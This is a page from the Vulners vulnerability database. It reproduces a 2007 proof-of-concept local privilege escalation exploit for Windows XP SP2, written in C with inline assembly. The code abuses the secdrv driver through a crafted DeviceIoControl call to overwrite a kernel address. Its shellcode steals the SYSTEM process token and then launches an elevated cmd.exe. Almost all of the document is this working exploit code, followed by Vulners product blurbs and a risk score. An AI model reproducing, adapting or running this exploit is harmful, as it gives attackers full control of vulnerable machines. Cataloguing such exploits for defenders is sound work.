Vulners
Lucene search
Windows Local Privilege Escalation Vulnerability Exploit
#Author: Polymorphours
#Email: [email protected]
#Homepage:http://www.whitecell.org
#Date: 2007-10-23
#include
#include
#pragma comment (lib, "ntdll.lib")
typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
typedef struct _IMAGE_FIXUP_ENTRY {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
NTSTATUS
(NTAPI *NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG AllocationSize,
IN ULONG AllocationType,
IN ULONG Protect
);
VOID
SetShellCodeToMemory(
PVOID ShellCodeMemory
)
{
OSVERSIONINFOEX OsVersionInfo;
RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
if ( OsVersionInfo.dwMajorVersion != 5 ) {
printf( "Not NT5 system\n" );
ExitProcess( 0 );
return;
}
if ( OsVersionInfo.dwMinorVersion == 1 ) {
__asm {
call CopyXpShellCode
nop
nop
nop
nop
nop
nop
mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
mov eax,[eax]
mov esi,[eax+0x220]
mov eax,esi
searchXp:
mov eax,[eax+0x88]
sub eax,0x88
mov edx,[eax+0x84]
cmp edx,0x4 // Find System Process
jne searchXp
mov eax,[eax+0xc8] // 获取system进程的token
mov [esi+0xc8],eax // 修改当前进程的token
ret 8
CopyXpShellCode:
pop esi
mov edi, ShellCodeMemory
lea ecx, CopyXpShellCode
sub ecx, esi
cld
rep movsb
}
}
}
int main(int argc, char* argv[])
{
NTSTATUS status;
PVOID ZwVdmControl = NULL;
DWORD HookAddress = 0x804E3AD8; // test by xp sp2
PVOID ShellCodeMemory = (PVOID)0x200;
DWORD MemorySize = 0x1000;
HANDLE deviceHandle;
DWORD dwReturnSize = 0;
SC_HANDLE hscmHandle = NULL;
SC_HANDLE hscDriver = NULL;
PROCESS_INFORMATION pi;
STARTUPINFOA stStartup;
PVOID InputBuffer = NULL;
printf( "\tWindows Local Privilege Escalation Vulnerability Exploit 0day (POC)\n" );
printf( "Create by Whitecell's [email protected] 2007/04/15\n" );
printf( "TEST OS: WINDOWS XP SP2\n" );
printf( "
Connect SCM ... " );
hscmHandle = OpenSCManager ( NULL, NULL, GENERIC_READ | SERVICE_START );
if ( NULL == hscmHandle ) {
printf( "failed, code: %d\n", GetLastError() );
return 0;
}
printf( "success!!\n" );
printf( "
Open services ... " );
hscDriver = OpenService( hscmHandle, "secdrv", GENERIC_READ | SERVICE_START );
if ( NULL == hscDriver ) {
printf( "failed, code: %d\n", GetLastError() );
CloseServiceHandle ( hscmHandle );
return 0;
}
printf( "success!!\n" );
printf( "
Start services ... " );
//
// 启动secdrv驱动
//
if ( !StartService( hscDriver, 0, NULL ) ) {
if ( ERROR_SERVICE_ALREADY_RUNNING != GetLastError() ) {
printf( "failed, code: %d\n", GetLastError() );
CloseServiceHandle ( hscDriver );
CloseServiceHandle ( hscmHandle );
return 0;
}
}
printf( "success!!\n" );
CloseServiceHandle ( hscDriver );
CloseServiceHandle ( hscmHandle );
NtAllocateVirtualMemory = (long (__stdcall *)(void *,void ** ,unsigned long,unsigned long *,unsigned long,unsigned
long))GetProcAddress( LoadLibrary("ntdll.dll"), "NtAllocateVirtualMemory" );
if ( NtAllocateVirtualMemory == NULL ) {
printf( "GetProcAddress failed, code: %d\n" );
return 0;
}
ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );
printf( "
Create execute environment ... " );
status = NtAllocateVirtualMemory( (HANDLE)-1,
&ShellCodeMemory,
0,
&MemorySize,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE );
if ( status != STATUS_SUCCESS ) {
printf( "failed!\n[-] NtAllocateVirtualMemory failed, status: %08X\n", status );
return 0;
}
printf( "Ok!\n" );
//
// 初始化 ShellCode
//
memset( ShellCodeMemory, 0x90, MemorySize );
SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x200) );
deviceHandle = CreateFile("\\\\.\\secdrv",
0,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if ( INVALID_HANDLE_VALUE == deviceHandle ) {
printf( "[-] Open device failed, code: %d\n", GetLastError() );
return 0;
} else {
printf( "
Open device success\n" );
}
InputBuffer = LocalAlloc( LPTR, 0x1000 );
*(PDWORD)InputBuffer = 0x1;
*(PDWORD)((DWORD)InputBuffer + 0x4) = 0x96;
DeviceIoControl( deviceHandle,
0xca002813,
InputBuffer,
4,
(PVOID)HookAddress,
4,
&dwReturnSize,
NULL );
CloseHandle( deviceHandle );
printf( "
call shellcode ... " );
_asm {
xor ecx,ecx
push ecx
push ecx
mov eax, ZwVdmControl
call eax
}
printf( "Done.\n" );
printf( "
Create New Process\n" );
GetStartupInfo( &stStartup );
CreateProcess( NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
NULL,
NULL,
NULL,
&stStartup,
&pi );
##http://www.4v1.org/thread-256-1-1.html
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Oct 2007 00:00Current
7.1High risk
Vulners AI Score7.1